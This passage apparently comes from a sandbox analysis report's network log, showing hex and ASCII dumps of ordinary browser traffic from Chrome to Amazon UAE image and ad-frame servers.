                                                                                                                                                                                                                                                                      Data Ascii: e].slotId&&(F("OffsetLeft",{id:a.adMap[e].options.placementId,name:o[e].slotId},l.offsetLeft),F("OffsetTop",{id:a.adMap[e].options.placementId,name:o[e].slotId},l.offsetTop),F("OffsetWidth",{id:a.adMap[e].options.placementId,name:o[e].slotId},l.offsetWidt
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC16384INData Raw: 3d 3d 28 6e 75 6c 6c 3d 3d 3d 28 61 3d 65 2e 73 65 6c 65 63 74 69 6f 6e 53 69 67 6e 61 6c 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 3f 76 6f 69 64 20 30 3a 61 2e 6c 6f 63 61 74 69 6f 6e 29 26 26 6e 75 6c 6c 21 3d 3d 28 6e 75 6c 6c 3d 3d 3d 28 6f 3d 65 2e 73 65 6c 65 63 74 69 6f 6e 53 69 67 6e 61 6c 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6f 3f 76 6f 69 64 20 30 3a 6f 2e 6c 6f 63 61 74 69 6f 6e 29 7c 7c 74 2e 70 75 73 68 28 22 44 53 41 20 45 72 72 6f 72 3a 20 73 65 6c 65 63 74 69 6f 6e 53 69 67 6e 61 6c 73 2e 6c 6f 63 61 74 69 6f 6e 20 6d 69 73 73 69 6e 67 22 29 2c 45 69 28 6e 75 6c 6c 3d 3d 3d 28 73 3d 65 2e 73 65 6c 65 63 74 69 6f 6e 53 69 67 6e 61 6c 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 73 3f 76 6f 69 64 20 30 3a 73 2e 70 61 73 74 41 63 74 69 76 69 74
                                                                                                                                                                                                                                                                      Data Ascii: ==(null===(a=e.selectionSignals)||void 0===a?void 0:a.location)&&null!==(null===(o=e.selectionSignals)||void 0===o?void 0:o.location)||t.push("DSA Error: selectionSignals.location missing"),Ei(null===(s=e.selectionSignals)||void 0===s?void 0:s.pastActivit
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC1415INData Raw: 3d 21 31 3b 63 6f 6e 73 74 20 61 3d 74 68 69 73 2e 6d 73 67 4c 69 73 74 65 6e 65 72 73 3b 74 72 79 7b 69 66 28 21 61 5b 65 5d 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 61 5b 65 5d 7c 7c 69 29 61 5b 65 5d 3d 74 2c 6e 3d 21 30 3b 65 6c 73 65 7b 63 6f 6e 73 74 20 74 3d 6e 65 77 20 45 72 72 6f 72 28 22 43 75 73 74 6f 6d 20 6d 65 73 73 61 67 65 20 6c 69 73 74 65 6e 65 72 20 61 6c 72 65 61 64 79 20 65 78 69 73 74 73 20 66 6f 72 20 6b 65 79 3a 20 22 2b 65 29 3b 75 28 22 44 75 70 6c 69 63 61 74 65 20 4b 65 79 22 2c 74 29 7d 7d 63 61 74 63 68 28 6f 29 7b 75 28 22 45 72 72 6f 72 20 72 65 67 69 73 74 65 72 69 6e 67 20 63 75 73 74 6f 6d 20 6d 65 73 73 61 67 65 20 6c 69 73 74 65 6e 65 72 22 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 2c 74 68 69 73 2e
                                                                                                                                                                                                                                                                      Data Ascii: =!1;const a=this.msgListeners;try{if(!a[e]||"function"!=typeof a[e]||i)a[e]=t,n=!0;else{const t=new Error("Custom message listener already exists for key: "+e);u("Duplicate Key",t)}}catch(o){u("Error registering custom message listener",o)}return n},this.


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      22192.168.2.54974518.239.99.1454432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC613OUTGET /images/S/apesafeframe/ape/sf/desktop/sf-1.50.f3986821.html HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC1643INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                      Content-Length: 167
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: fb09f017-a5f9-4619-aaa9-fa803a87c0fb
                                                                                                                                                                                                                                                                      Date: Sat, 17 Aug 2024 01:11:31 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=15552000,public
                                                                                                                                                                                                                                                                      Last-Modified: Sat, 17 Aug 2024 01:10:58 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors amazon.com *.amazon.com amazon.ca *.amazon.ca amazon.com.mx *.amazon.com.mx amazon.com.br *.amazon.com.br amazon.de *.amazon.de amazon.co.uk *.amazon.co.uk amazon.fr *.amazon.fr amazon.it *.amazon.it amazon.es *.amazon.es amazon.in *.amazon.in amazon.ae *.amazon.ae amazon.sa *.amazon.sa amazon.nl *.amazon.nl amazon.com.tr *.amazon.com.tr amazon.se *.amazon.se amazon.co.jp *.amazon.co.jp amazon.com.au *.amazon.com.au amazon.cn *.amazon.cn imdb.com *.imdb.com boxofficemojo.com *.boxofficemojo.com amazon.sg *.amazon.sg amazon.eg *.amazon.eg amazon.pl *.amazon.pl amazon.com.be *.amazon.com.be amazon.co.za *.amazon.co.za *.amazon.dev *.a2z.com *.harmony.a2z.com *.console.harmony.a2z.com *.depot.advertising.amazon.dev
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-600,/images/S/apesafeframe/ape/sf/desktop/sf-1.50.f3986821
                                                                                                                                                                                                                                                                      Expires: Thu, 13 Feb 2025 01:11:31 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-600 /images/S/apesafeframe/ape/sf/desktop/sf-1.50.f3986821
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Via: 1.1 7cda9a7fe68f979d43fe743d9fbd0db4.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 407815
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS1-P3
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: ip9oe1MZ_J3p1_OgF_JGXCT8msTJChYwtRUXa6IhBq71dFSKrza32A==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC167INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 73 66 2d 31 2e 35 30 2e 61 66 32 35 32 37 38 62 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html><head><style>body{background-color:transparent;margin:0;padding:0}</style></head><body> <script src="sf-1.50.af25278b.js" ></script></body></html>


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      23192.168.2.549747151.101.1.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC608OUTGET /images/I/61cg-CaC1GL._SX1500_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC659INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 83172
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: 22c55265-8350-4b09-8112-793239d8dba6
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Thu, 15 Aug 2024 06:35:42 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Expires: Thu, 11 Aug 2044 19:01:03 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 430058
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:41 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kcgs7200161-IAD, cache-ewr-kewr1740045-EWR
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff eb 34 47 4a 50 02 11 00 00 00 01 00 00 34 3d 6a 75 6d 62 00 00 00 1e 6a 75 6d 64 63 32 70 61 00 11 00 10 80 00 00 aa 00 38 9b 71 03 63 32 70 61 00 00 00 34 17 6a 75 6d 62 00 00 00 47 6a 75 6d 64 63 32 6d 61 00 11 00 10 80 00 00 aa 00 38 9b 71 03 75 72 6e 3a 75 75 69 64 3a 39 37 39 65 31 63 30 62 2d 62 63 61 63 2d 34 38 31 38 2d 61 63 34 36 2d 32 38 38 35 39 35 34 32 61 36 33 31 00 00 00 01 b4 6a 75 6d 62 00 00 00 29 6a 75 6d 64 63 32 61 73 00 11 00 10 80 00 00 aa 00 38 9b 71 03 63 32 70 61 2e 61 73 73 65 72 74 69 6f 6e 73 00 00 00 00 d7 6a 75 6d 62 00 00 00 26 6a 75 6d 64 63 62 6f 72 00 11 00 10 80 00 00 aa 00 38 9b
                                                                                                                                                                                                                                                                      Data Ascii: JFIFExifII*4GJP4=jumbjumdc2pa8qc2pa4jumbGjumdc2ma8qurn:uuid:979e1c0b-bcac-4818-ac46-28859542a631jumb)jumdc2as8qc2pa.assertionsjumb&jumdcbor8
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC1378INData Raw: 30 5a 17 0d 32 35 30 31 31 30 32 33 35 39 35 39 5a 30 7f 31 11 30 0f 06 03 55 04 03 0c 08 63 61 69 2d 70 72 6f 64 31 13 30 11 06 03 55 04 0a 0c 0a 41 64 6f 62 65 20 49 6e 63 2e 31 11 30 0f 06 03 55 04 07 0c 08 53 61 6e 20 4a 6f 73 65 31 13 30 11 06 03 55 04 08 0c 0a 43 61 6c 69 66 6f 72 6e 69 61 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 20 30 1e 06 09 2a 86 48 86 f7 0d 01 09 01 16 11 63 61 69 2d 6f 70 73 40 61 64 6f 62 65 2e 63 6f 6d 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 ef d3 00 a7 7d 86 3d 96 41 c3 b3 29 2b 4c 6e c5 62 59 d8 1c 17 32 b9 a9 6e 0f 9b bd 50 b8 f3 bf e1 6c 4d 63 8b 83 c3 61 af 3f 51 4f 12 3d 11 e0 5b bb 75 a6 ed fe 2f a8 fb 10 61 fc 64 12 9d 30 21 ae 83 56 61 0e 66 16 c0 79 17 db
                                                                                                                                                                                                                                                                      Data Ascii: 0Z250110235959Z010Ucai-prod10UAdobe Inc.10USan Jose10UCalifornia10UUS1 0*Hcai-ops@adobe.com0"0*H0}=A)+LnbY2nPlMca?QO=[u/ad0!Vafy
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC1378INData Raw: a1 30 82 04 89 a0 03 02 01 02 02 10 0c a8 b6 54 7b 89 e6 d2 06 89 75 cd 8b 9b 89 e2 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 6c 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 23 30 21 06 03 55 04 0a 13 1a 41 64 6f 62 65 20 53 79 73 74 65 6d 73 20 49 6e 63 6f 72 70 6f 72 61 74 65 64 31 1d 30 1b 06 03 55 04 0b 13 14 41 64 6f 62 65 20 54 72 75 73 74 20 53 65 72 76 69 63 65 73 31 19 30 17 06 03 55 04 03 13 10 41 64 6f 62 65 20 52 6f 6f 74 20 43 41 20 47 32 30 1e 17 0d 31 36 31 31 32 39 30 30 30 30 30 30 5a 17 0d 34 31 31 31 32 38 32 33 35 39 35 39 5a 30 75 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 23 30 21 06 03 55 04 0a 13 1a 41 64 6f 62 65 20 53 79 73 74 65 6d 73 20 49 6e 63 6f 72 70 6f 72 61 74 65 64 31 1d 30 1b 06 03 55 04 0b 13 14 41 64 6f 62 65 20 54
                                                                                                                                                                                                                                                                      Data Ascii: 0T{u0*H0l10UUS1#0!UAdobe Systems Incorporated10UAdobe Trust Services10UAdobe Root CA G20161129000000Z411128235959Z0u10UUS1#0!UAdobe Systems Incorporated10UAdobe T
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC1378INData Raw: 97 be 22 2d 2b 46 54 52 8f c0 22 d8 45 2a 58 44 5e c9 ea f5 52 fd 7c 56 e0 bc ef 37 66 fa 54 42 8e 72 f2 66 37 72 e1 a7 11 51 97 76 18 cd 6f 9d c2 7c 2d 6e e1 d6 e9 62 65 9a 37 df 6c b9 b5 33 12 c5 1a 51 bd e5 a0 b3 df 55 fc c3 3a 98 36 cb db f7 ee 40 5d cb fc 2e 5e bd b4 b5 e6 3b 53 ad b1 8f f7 c0 82 cd 50 4a 78 54 b6 53 13 7c 2a 9b 79 fc 84 c9 c2 95 98 a2 2b 26 42 4b b2 f8 13 49 82 95 bc 7e 05 14 8c 1f 77 95 a3 a8 e0 bd ee 35 fd f2 b7 15 03 38 40 23 48 92 91 ac ec 58 e3 2f 2f a9 b4 2f 89 cb 25 aa 71 fb ce 46 b1 55 fc 63 a0 07 98 43 f8 6e 60 84 97 08 a5 e8 a0 0f f9 47 b0 24 58 b0 e6 b9 b0 57 6a 44 48 70 21 62 e6 49 6b 4d c1 f2 d9 74 9d dd 90 27 3b c9 1a 66 de 06 a5 ea a4 5f 4e 46 29 c5 33 71 c4 ac af 29 b9 1a 24 3a 31 47 db ed 5a b0 b7 88 da d0 77 d5 6f
                                                                                                                                                                                                                                                                      Data Ascii: "-+FTR"E*XD^R|V7fTBrf7rQvo|-nbe7l3QU:6@].^;SPJxTS|*y+&BKI~w58@#HX///%qFUcCn`G$XWjDHp!bIkMt';f_NF)3q)$:1GZwo
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC1378INData Raw: 8b f7 23 c1 e9 16 52 5a e2 e0 70 51 32 14 80 75 a9 8b c5 f1 77 52 44 11 7f 78 3c e3 83 8b b1 f2 49 e9 17 eb 40 34 e7 90 68 cc 56 fb 18 65 5a c5 bd 0b ad e4 13 45 79 e4 af a8 20 3c d5 0f 5f d1 a1 fb 64 9c 3b 19 53 75 04 0b 81 96 e4 75 8b f1 a3 70 29 e9 cc bd ae 26 62 8d 1c 4e 66 a8 8e c9 64 b1 31 48 60 2b 17 8a cf 0a c5 5b a5 db 7b 46 b0 36 13 94 5d 9c c8 c5 ce 22 c6 92 b3 59 22 2d a4 f2 77 d1 98 81 42 7e 3d 53 70 03 61 39 ec 85 b3 7d 66 44 c0 d6 91 df fc da 2f d9 95 2f bd d7 64 67 c5 18 bf 0a 3d bc 1b cb 4c 3b e7 98 00 67 44 c0 4a 69 76 00 b3 76 42 bf 0f 42 90 33 ce 59 37 94 24 c1 51 02 d9 94 c7 9d a8 85 a0 37 9c 3f 1b 08 9e 94 7e 94 36 a4 57 ce 75 28 70 a5 be 86 2a fd 20 f8 18 1c 74 81 b6 2c 73 c9 d1 47 e6 af e5 e6 a6 06 60 ab f1 c8 81 ed 21 8d c0 80 0e
                                                                                                                                                                                                                                                                      Data Ascii: #RZpQ2uwRDx<I@4hVeZEy <_d;Suup)&bNfd1H`+[{F6]"Y"-wB~=Spa9}fD//dg=L;gDJivvBB3Y7$Q7?~6Wu(p* t,sG`!
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC1378INData Raw: 01 ff 04 04 03 02 01 86 30 13 06 03 55 1d 25 04 0c 30 0a 06 08 2b 06 01 05 05 07 03 08 30 77 06 08 2b 06 01 05 05 07 01 01 04 6b 30 69 30 24 06 08 2b 06 01 05 05 07 30 01 86 18 68 74 74 70 3a 2f 2f 6f 63 73 70 2e 64 69 67 69 63 65 72 74 2e 63 6f 6d 30 41 06 08 2b 06 01 05 05 07 30 02 86 35 68 74 74 70 3a 2f 2f 63 61 63 65 72 74 73 2e 64 69 67 69 63 65 72 74 2e 63 6f 6d 2f 44 69 67 69 43 65 72 74 54 72 75 73 74 65 64 52 6f 6f 74 47 34 2e 63 72 74 30 43 06 03 55 1d 1f 04 3c 30 3a 30 38 a0 36 a0 34 86 32 68 74 74 70 3a 2f 2f 63 72 6c 33 2e 64 69 67 69 63 65 72 74 2e 63 6f 6d 2f 44 69 67 69 43 65 72 74 54 72 75 73 74 65 64 52 6f 6f 74 47 34 2e 63 72 6c 30 20 06 03 55 1d 20 04 19 30 17 30 08 06 06 67 81 0c 01 04 02 30 0b 06 09 60 86 48 01 86 fd 6c 07 01 30 0d
                                                                                                                                                                                                                                                                      Data Ascii: 0U%0+0w+k0i0$+0http://ocsp.digicert.com0A+05http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0CU<0:08642http://crl3.digicert.com/DigiCertTrustedRootG4.crl0 U 00g0`Hl0
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC1378INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC1378INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC1378INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC1378INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                      Data Ascii:


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      24192.168.2.54974818.239.99.1454432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC704OUTGET /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742948_3924072_186x116_1X_en_AE._SY116_CB566513340_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:42 UTC960INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      Content-Length: 4937
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: 250b8774-9304-4e70-9ba9-9111e2a05148
                                                                                                                                                                                                                                                                      Date: Fri, 09 Aug 2024 20:48:29 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Fri, 09 Aug 2024 13:38:27 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-243,/images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742948_3924072_186x116_1X_en_AE
                                                                                                                                                                                                                                                                      Expires: Thu, 04 Aug 2044 20:48:29 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-243 /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742948_3924072_186x116_1X_en_AE
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Via: 1.1 47168233f5be3757636a095d7386d7d8.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 219300
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS1-P3
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: 99gZuOUUvnNvQW1TTmKRJfNV6_IN87rolwPc-lg5SjjY-GYaPznWHw==
